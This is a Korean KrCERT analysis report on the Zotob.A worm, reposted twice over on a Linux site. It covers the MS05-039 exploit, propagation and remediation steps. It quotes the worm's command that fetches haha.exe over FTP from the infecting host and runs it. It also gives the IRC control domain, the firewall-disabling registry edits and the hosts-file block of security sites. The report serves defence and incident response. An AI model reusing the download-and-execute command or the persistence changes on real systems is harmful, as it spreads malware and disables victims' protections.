리눅스 분류
Zotob.A 웜 분석 보고서
작성자 정보
- 웹관리자 작성
- 작성일
컨텐츠 정보
- 5,792 조회
- 0 추천
- 목록
본문
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
Zotob.A 웜 분석 보고서
2005. 8. 16
인터넷침해사고대응지원센터 (KISC)
※ 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]를 명시하여 주시기 바랍니다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 1 -
□ 개 요
Zotob.A 웜은 Microsoft Windows Plug and Play 취약점 (MS05-039)을 이
용하여 전파되는 웜이다. 감염 시 시스템 폴더에 botzor.exe 이름으로 웜 파
일이 복사되고, 레지스트리가 추가된다.
감염 후 IRC 서버로의 접속시도가 관찰 되었으며, 명령전달을 통한 추가적인
악성행위가 발생할 가능성이 있다. 해당 취약점에 대해 패치를 진행하지 않
은 다수의 이용자가 있을 것으로 추정되어 확산에 대한 주의가 필요하다
o 관련 포트 트래픽 동향
※ 2005. 8.15 현재 국내 Microsoft Windows Plug and Play 취약점 관련 포
트(TCP 445) 트래픽 추이에 이상 징후가 없는 것으로 관찰되었으나 계속적인
주의가 필요.
<2005.8.07 ~ 2005.8.15 TCP 445 포트 트래픽 (bps, pps) 변동 추이>
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 2 -
o 웜 파일명 및 크기, 형태
파일명 파일크기
botzor.exe 22,528 byte
o 감염 대상 및 이용되는 취약점
- 감염대상: Microsoft Windows 2000
- 이용되는 취약점: Microsoft Windows Plug and Play (MS05-039)
□ 주요 공격 및 전파 기법
Zotob.A 웜은 Microsoft Windows Plug and Play 취약점을 이용하여 자신을
전파한다.
감염 후 특정 IRC 서버로의 접속시도가 발생하는데, 해당 서버로부터 명령을
전달 받을 경우 웜 업그레이드 및 기타 추가적인 피해가 발생할 가능성이 있
다.
o 웜 전파에 악용되는 취약점 상세
- Microsoft Windows Plug and Play
“Plug and Play”란 사용자가 시스템에 새로운 장치를 설치하였을 때 자
동으로 감지하여 사용할 수 있도록 해주는 윈도우 서비스를 말한다.
이 서비스 내에는 Stack Overflow를 일으킬 수 있는 취약점이 존재하는
데, 공격자는 named pipes, null session 으로 원격에서 이 취약점을 공
격할 수 있다. 윈도우 XP와 Windows 2003의 경우 공격 성공을 위하여
인증과정이 필요하나, 윈도우2000 에서는 null session을 통하여 인증 과
정 없이 곧바로 원격에서 공격이 가능하다
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 3 -
o 공격 및 감염 절차
공격 및 감염 절차는 다음과 같다. Windows Plug and Play 취약점이 존재
할 경우 감염되며, 공격 시 TCP 445를 이용한다. 감염 시에는 자신이 감염
된 동일한 방법으로 타 시스템을 공격한다. 또한 감염 후 특정 IRC 서버에
접속하여 명령을 전달 받는다.
자세한 감염 절차는 다음과 같다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 4 -
① 감염된 PC (PC A)는 TCP 33333 포트를 open 한다. 이 포트는 FTP 서
비스로써 웜 코드 전송 시 사용된다.
② 감염된 PC는 TCP 445 포트 Scan을 시작한다. 응답이 있을 경우, "Plug
and Play 취약점“ 공격 코드를 전송한다.
③ 취약점 공격 성공 시 감염대상 PC (PC B)에서 Dos Shell이 TCP 8888
포트로 bind 된다
④ 공격 PC (PC A)는 이 열려진 Shell 포트를 이용하여 웜을 전송하기 위
한 명령을 전달한다.
⑤ PC B는 이 전달받은 명령에 의하여 PC A의 TCP 33333 포트로 접속하
여 웜을 다운로드 받고 실행하게 된다.
☞ 네트워크 트래픽 분석 통한 감염 절차 확인
i) 감염 시 주소 A.B.C.D. 중 C,D를 Random 하게 변경해 가며 TCP 445 Syn
Scan 을 한다.
ii) 응답이 올 경우 “Plug and Play” service overflow 공격 및 Shell 획득
하기 위한 공격 코드를 전송한다 . 공격이 성공할 경우 감염대상 PC에
TCP 8888로 쉘 포트가 열린다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 5 -
iii) 공격 PC는 열려진 Shell 포트 (TCP 8888)를 이용하여 아래와 같이 웜을
전송하기 위한 명령을 전달한다
전송 되는 스크립트 코드는 다음과 같다.
echo open 192.168.1.22 33333 > 2pac.txt&echo user hell rulez >>
2pac.txt&echo binary >> 2pac.txt &echo get haha.exe >>&echo quit >>
2pac.txt& ftp.exe -n -s:2pac.txt&haha.exe
위 코드는 웜 다운로드를 위한 스크립트이다. 자동 실행될 수 있도록 2pac.txt
파일을 생성한 후 ftp를 non-interactive mode로 실행하는 것을 확인할 수 있
다. 또한 다운로드 완료 후에는 웜 파일인 haha.exe를 실행시킨다. 코드를 정
리해 보면 다음과 같다.
☞ 생성 파일 및 내용
[2pac.txt]
open 192.168.1.22 33333
user hell rulez
binary
get haha.exe
quit
☞ 실행 명령: ftp.exe -n -s:2pac.txt
haha.exe
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 6 -
해당 전송된 스크립트 명령에 의하여 감염대상 PC는 공격PC의 웜이 구성해 놓
은 FTP서버로 접속(TCP 33333)하게 되고, 웜 파일인 haha.exe 파일을 다운로드
한 후 실행하게 된다.
o 감염 후 IRC 서버로의 접근 및 명령 수신 대기
감염 후에는 아래와 같이 diabl0.turkcoders.net 로의 접근시도가 관찰되었다.
DNS 쿼리 후 해당 도메인의 tcp 8080 번 포트로 연결을 시도하는 것을 확
인할 수 있다.
해당 접속 사이트는 IRC 사이트로써 웜은 아래와 같이 웜 제작자가 생성한
채널에 접속하여 명령을 전달 받기 위하여 대기한다.
이 백도어 채널을 통하여 웜 업그레이드, 정보 유출 등 추가적인 피해 발생
이 예상된다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 7 -
□ OS 변경 사항
- 파일 생성
감염 시 아래와 같이 웜 파일이 생성되는 것으로 관찰되었다.
․윈도우 시스템 폴더에 botzor.exe 파일이 만들어 진다.
※ 윈도우 시스템 폴더: WinNT,2000 c:winntsystem32
WinXP c:Windowssystem32
- 레지스트리 변경/추가 발생
웜은 재 부팅 시에도 메모리에 다시 로딩되게 하기 위하여 레지스트리에
자신을 등록해 놓는다. 등록되는 레지스트리는 다음과 같다
HKLMSoftwareMicrosoftWindowsCurrentVersionRun
WINDOWS SYSTEM "botzor.exe"
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices
WINDOWS SYSTEM "botzor.exe"
또한, 아래와 같이 레지스트리 값을 변경하여 방화벽 및 인터넷 연결 공유
기능을 해제한다.
HKLMSYSTEMCurrentControlSetServicesSharedAccessStart 0x4
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 8 -
□ 감염 후 특이 사항
감염 시 일부 보안관련 사이트 접속에 장애가 발생한다. 웜은 주요 보안 사
이트에 대한 접속을 차단하기 위하여 시스템폴더driversetchosts 파일에
아래의 내용을 추가한다.
해당도메인들의 IP 주소가 loopback으로 고정되게 되어 접속장애가 발생한다
“시스템 폴더”driversetchosts
Botzor2005 Made By .... Greetz to good friend Coder. Based On HellBot3
MSG to avs: the first av who detect this worm will be the first killed in the
next 24hours!!!
127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 9 -
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 10 -
TCP 445
(Windows Plug and Play)
TCP 8080
(IRC 서버 접속)
공격 빈도 / 분당 3,928 회 2 회
발생 트래픽 (syn) / 분당 259,849 byte 128 byte
Zobot.A 웰치아.B AgoBot441344 Sasser.A Bobax.C
3,928 회 2,400 회 80,000 회 1,000 회 5,524 회
□ 네트워크 영향력
감염 후, 타 시스템을 공격하는 빈도 및 발생시키는 트래픽은 아래와 같다.
※ 수치는 시험환경에 따라 달라질 수 있다.
- 공격 빈도 및 발생 트래픽
<분당 공격 시도 횟수 샘플>
아래 화면은 감염PC에서 발생하는 TCP 445 Syn 공격의 10분간의 횟수를 나타낸
다. 따라서, 분당 3,928 회로 볼 수 있다
- 타 웜 과의 트래픽 발생률 비교 분석
* 결과치는 환경에 따라 차이가 있을 수 있음
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 11 -
□ 위험 요소
Microsoft Windows Plug and Play 취약점은 Microsoft에 의해서 패치가 배
포 되었지만, 최근에 배포되어 해당 취약점에 대한 패치를 진행하지 않은
다수의 이용자가 있을 것으로 추정되어 확산에 대한 주의가 필요하다
□ 예방 및 대응 방안
o 네트워크 관리자
- 가능하면 TCP445 포트를 네트워크 세그먼트 별로 차단하도록 한다
- diabl0.turkcoders.net 도메인 쿼리 트래픽을 차단하도록 한다
o 사용자
- 신속히 MS05-039 패치를 실시 하도록 한다
- 백신 업데이트 및 주기적으로 감염 여부를 점검한다
□ 감염 확인 및 조치 방법
o 감염 확인 방법
시스템 폴더에 botzor.exe 파일이 존재하는지 확인한다.
해당 파일이 존재한다면 감염된 것으로 보아야 한다
※ 윈도우 시스템 폴더: WinNT,2000 c:winntsystem32
WinXP c:Windowssystem32
o 감염 시 조치 방법
Step1. "Ctrl" + "Alt" + "Del" 을 누른 후 "프로세스" 메뉴를 클릭하여
botzor.exe를 선택한다. 마우스 오른쪽버튼을 누른 후 프로세스 끝
내기를 클릭한다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 12 -
Step2. 시스템 폴더의 botzor.exe 파일 삭제한다.
※시스템 폴더 :
윈도우 2K : winntsystem32
윈도우 XP: windowssystem32
Step3. 아래와 같이 웜이 생성한 레지스트리를 삭제한다.
시작 → 실행 클릭 후 regedit 입력
HKLMSoftwareMicrosoftWindowsCurrentVersionRun
WINDOWS SYSTEM "botzor.exe" 를 삭제한다.
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices
WINDOWS SYSTEM "botzor.exe"를 삭제한다
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 13 -
Step4. 방화벽 및 인터넷 연결공유기능 설정을 원래의 값으로 복구시킨다.
HKLMSYSTEMCurrentControlSetServicesSharedAccess
Start 값을 아래와 같이 “2” 로 변경한다.
Step5. 보안관련 사이트 접속 장애를 발생시키기 위하여 웜이 추가해 놓은
항목들을 삭제한다. “시스템 폴더“의 driversetchosts 파일에서
사용자가 편집하지 않았는데 추가되어 있는 loopback (127.0.0.1) 항
목들을 모두 삭제한다
※시스템 폴더 :
윈도우 2K : winntsystem32
윈도우 XP: windowssystem32
[참조 사이트] http://xforce.iss.net/xforce/alerts/id/202
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
Zotob.A 웜 분석 보고서
2005. 8. 16
인터넷침해사고대응지원센터 (KISC)
※ 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]를 명시하여 주시기 바랍니다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 1 -
□ 개 요
Zotob.A 웜은 Microsoft Windows Plug and Play 취약점 (MS05-039)을 이
용하여 전파되는 웜이다. 감염 시 시스템 폴더에 botzor.exe 이름으로 웜 파
일이 복사되고, 레지스트리가 추가된다.
감염 후 IRC 서버로의 접속시도가 관찰 되었으며, 명령전달을 통한 추가적인
악성행위가 발생할 가능성이 있다. 해당 취약점에 대해 패치를 진행하지 않
은 다수의 이용자가 있을 것으로 추정되어 확산에 대한 주의가 필요하다
o 관련 포트 트래픽 동향
※ 2005. 8.15 현재 국내 Microsoft Windows Plug and Play 취약점 관련 포
트(TCP 445) 트래픽 추이에 이상 징후가 없는 것으로 관찰되었으나 계속적인
주의가 필요.
<2005.8.07 ~ 2005.8.15 TCP 445 포트 트래픽 (bps, pps) 변동 추이>
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 2 -
o 웜 파일명 및 크기, 형태
파일명 파일크기
botzor.exe 22,528 byte
o 감염 대상 및 이용되는 취약점
- 감염대상: Microsoft Windows 2000
- 이용되는 취약점: Microsoft Windows Plug and Play (MS05-039)
□ 주요 공격 및 전파 기법
Zotob.A 웜은 Microsoft Windows Plug and Play 취약점을 이용하여 자신을
전파한다.
감염 후 특정 IRC 서버로의 접속시도가 발생하는데, 해당 서버로부터 명령을
전달 받을 경우 웜 업그레이드 및 기타 추가적인 피해가 발생할 가능성이 있
다.
o 웜 전파에 악용되는 취약점 상세
- Microsoft Windows Plug and Play
“Plug and Play”란 사용자가 시스템에 새로운 장치를 설치하였을 때 자
동으로 감지하여 사용할 수 있도록 해주는 윈도우 서비스를 말한다.
이 서비스 내에는 Stack Overflow를 일으킬 수 있는 취약점이 존재하는
데, 공격자는 named pipes, null session 으로 원격에서 이 취약점을 공
격할 수 있다. 윈도우 XP와 Windows 2003의 경우 공격 성공을 위하여
인증과정이 필요하나, 윈도우2000 에서는 null session을 통하여 인증 과
정 없이 곧바로 원격에서 공격이 가능하다
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 3 -
o 공격 및 감염 절차
공격 및 감염 절차는 다음과 같다. Windows Plug and Play 취약점이 존재
할 경우 감염되며, 공격 시 TCP 445를 이용한다. 감염 시에는 자신이 감염
된 동일한 방법으로 타 시스템을 공격한다. 또한 감염 후 특정 IRC 서버에
접속하여 명령을 전달 받는다.
자세한 감염 절차는 다음과 같다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 4 -
① 감염된 PC (PC A)는 TCP 33333 포트를 open 한다. 이 포트는 FTP 서
비스로써 웜 코드 전송 시 사용된다.
② 감염된 PC는 TCP 445 포트 Scan을 시작한다. 응답이 있을 경우, "Plug
and Play 취약점“ 공격 코드를 전송한다.
③ 취약점 공격 성공 시 감염대상 PC (PC B)에서 Dos Shell이 TCP 8888
포트로 bind 된다
④ 공격 PC (PC A)는 이 열려진 Shell 포트를 이용하여 웜을 전송하기 위
한 명령을 전달한다.
⑤ PC B는 이 전달받은 명령에 의하여 PC A의 TCP 33333 포트로 접속하
여 웜을 다운로드 받고 실행하게 된다.
☞ 네트워크 트래픽 분석 통한 감염 절차 확인
i) 감염 시 주소 A.B.C.D. 중 C,D를 Random 하게 변경해 가며 TCP 445 Syn
Scan 을 한다.
ii) 응답이 올 경우 “Plug and Play” service overflow 공격 및 Shell 획득
하기 위한 공격 코드를 전송한다 . 공격이 성공할 경우 감염대상 PC에
TCP 8888로 쉘 포트가 열린다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 5 -
iii) 공격 PC는 열려진 Shell 포트 (TCP 8888)를 이용하여 아래와 같이 웜을
전송하기 위한 명령을 전달한다
전송 되는 스크립트 코드는 다음과 같다.
echo open 192.168.1.22 33333 > 2pac.txt&echo user hell rulez >>
2pac.txt&echo binary >> 2pac.txt &echo get haha.exe >>&echo quit >>
2pac.txt& ftp.exe -n -s:2pac.txt&haha.exe
위 코드는 웜 다운로드를 위한 스크립트이다. 자동 실행될 수 있도록 2pac.txt
파일을 생성한 후 ftp를 non-interactive mode로 실행하는 것을 확인할 수 있
다. 또한 다운로드 완료 후에는 웜 파일인 haha.exe를 실행시킨다. 코드를 정
리해 보면 다음과 같다.
☞ 생성 파일 및 내용
[2pac.txt]
open 192.168.1.22 33333
user hell rulez
binary
get haha.exe
quit
☞ 실행 명령: ftp.exe -n -s:2pac.txt
haha.exe
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 6 -
해당 전송된 스크립트 명령에 의하여 감염대상 PC는 공격PC의 웜이 구성해 놓
은 FTP서버로 접속(TCP 33333)하게 되고, 웜 파일인 haha.exe 파일을 다운로드
한 후 실행하게 된다.
o 감염 후 IRC 서버로의 접근 및 명령 수신 대기
감염 후에는 아래와 같이 diabl0.turkcoders.net 로의 접근시도가 관찰되었다.
DNS 쿼리 후 해당 도메인의 tcp 8080 번 포트로 연결을 시도하는 것을 확
인할 수 있다.
해당 접속 사이트는 IRC 사이트로써 웜은 아래와 같이 웜 제작자가 생성한
채널에 접속하여 명령을 전달 받기 위하여 대기한다.
이 백도어 채널을 통하여 웜 업그레이드, 정보 유출 등 추가적인 피해 발생
이 예상된다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 7 -
□ OS 변경 사항
- 파일 생성
감염 시 아래와 같이 웜 파일이 생성되는 것으로 관찰되었다.
․윈도우 시스템 폴더에 botzor.exe 파일이 만들어 진다.
※ 윈도우 시스템 폴더: WinNT,2000 c:winntsystem32
WinXP c:Windowssystem32
- 레지스트리 변경/추가 발생
웜은 재 부팅 시에도 메모리에 다시 로딩되게 하기 위하여 레지스트리에
자신을 등록해 놓는다. 등록되는 레지스트리는 다음과 같다
HKLMSoftwareMicrosoftWindowsCurrentVersionRun
WINDOWS SYSTEM "botzor.exe"
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices
WINDOWS SYSTEM "botzor.exe"
또한, 아래와 같이 레지스트리 값을 변경하여 방화벽 및 인터넷 연결 공유
기능을 해제한다.
HKLMSYSTEMCurrentControlSetServicesSharedAccessStart 0x4
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 8 -
□ 감염 후 특이 사항
감염 시 일부 보안관련 사이트 접속에 장애가 발생한다. 웜은 주요 보안 사
이트에 대한 접속을 차단하기 위하여 시스템폴더driversetchosts 파일에
아래의 내용을 추가한다.
해당도메인들의 IP 주소가 loopback으로 고정되게 되어 접속장애가 발생한다
“시스템 폴더”driversetchosts
Botzor2005 Made By .... Greetz to good friend Coder. Based On HellBot3
MSG to avs: the first av who detect this worm will be the first killed in the
next 24hours!!!
127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 9 -
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 10 -
TCP 445
(Windows Plug and Play)
TCP 8080
(IRC 서버 접속)
공격 빈도 / 분당 3,928 회 2 회
발생 트래픽 (syn) / 분당 259,849 byte 128 byte
Zobot.A 웰치아.B AgoBot441344 Sasser.A Bobax.C
3,928 회 2,400 회 80,000 회 1,000 회 5,524 회
□ 네트워크 영향력
감염 후, 타 시스템을 공격하는 빈도 및 발생시키는 트래픽은 아래와 같다.
※ 수치는 시험환경에 따라 달라질 수 있다.
- 공격 빈도 및 발생 트래픽
<분당 공격 시도 횟수 샘플>
아래 화면은 감염PC에서 발생하는 TCP 445 Syn 공격의 10분간의 횟수를 나타낸
다. 따라서, 분당 3,928 회로 볼 수 있다
- 타 웜 과의 트래픽 발생률 비교 분석
* 결과치는 환경에 따라 차이가 있을 수 있음
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 11 -
□ 위험 요소
Microsoft Windows Plug and Play 취약점은 Microsoft에 의해서 패치가 배
포 되었지만, 최근에 배포되어 해당 취약점에 대한 패치를 진행하지 않은
다수의 이용자가 있을 것으로 추정되어 확산에 대한 주의가 필요하다
□ 예방 및 대응 방안
o 네트워크 관리자
- 가능하면 TCP445 포트를 네트워크 세그먼트 별로 차단하도록 한다
- diabl0.turkcoders.net 도메인 쿼리 트래픽을 차단하도록 한다
o 사용자
- 신속히 MS05-039 패치를 실시 하도록 한다
- 백신 업데이트 및 주기적으로 감염 여부를 점검한다
□ 감염 확인 및 조치 방법
o 감염 확인 방법
시스템 폴더에 botzor.exe 파일이 존재하는지 확인한다.
해당 파일이 존재한다면 감염된 것으로 보아야 한다
※ 윈도우 시스템 폴더: WinNT,2000 c:winntsystem32
WinXP c:Windowssystem32
o 감염 시 조치 방법
Step1. "Ctrl" + "Alt" + "Del" 을 누른 후 "프로세스" 메뉴를 클릭하여
botzor.exe를 선택한다. 마우스 오른쪽버튼을 누른 후 프로세스 끝
내기를 클릭한다.
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 12 -
Step2. 시스템 폴더의 botzor.exe 파일 삭제한다.
※시스템 폴더 :
윈도우 2K : winntsystem32
윈도우 XP: windowssystem32
Step3. 아래와 같이 웜이 생성한 레지스트리를 삭제한다.
시작 → 실행 클릭 후 regedit 입력
HKLMSoftwareMicrosoftWindowsCurrentVersionRun
WINDOWS SYSTEM "botzor.exe" 를 삭제한다.
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices
WINDOWS SYSTEM "botzor.exe"를 삭제한다
KrCERT-AR-2005-083 http://www.krcert.or.kr
Zotob.A 웜 분석보고서 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 13 -
Step4. 방화벽 및 인터넷 연결공유기능 설정을 원래의 값으로 복구시킨다.
HKLMSYSTEMCurrentControlSetServicesSharedAccess
Start 값을 아래와 같이 “2” 로 변경한다.
Step5. 보안관련 사이트 접속 장애를 발생시키기 위하여 웜이 추가해 놓은
항목들을 삭제한다. “시스템 폴더“의 driversetchosts 파일에서
사용자가 편집하지 않았는데 추가되어 있는 loopback (127.0.0.1) 항
목들을 모두 삭제한다
※시스템 폴더 :
윈도우 2K : winntsystem32
윈도우 XP: windowssystem32
[참조 사이트] http://xforce.iss.net/xforce/alerts/id/202
"무단배포금지: 클라우드포털(www.linux.co.kr)의 모든 강좌는 저작권에 의해 보호되는 콘텐츠입니다. 무단으로 복제하여 배포하는 행위는 금지되어 있습니다."
관련자료
-
이전
-
다음
댓글 0
등록된 댓글이 없습니다.
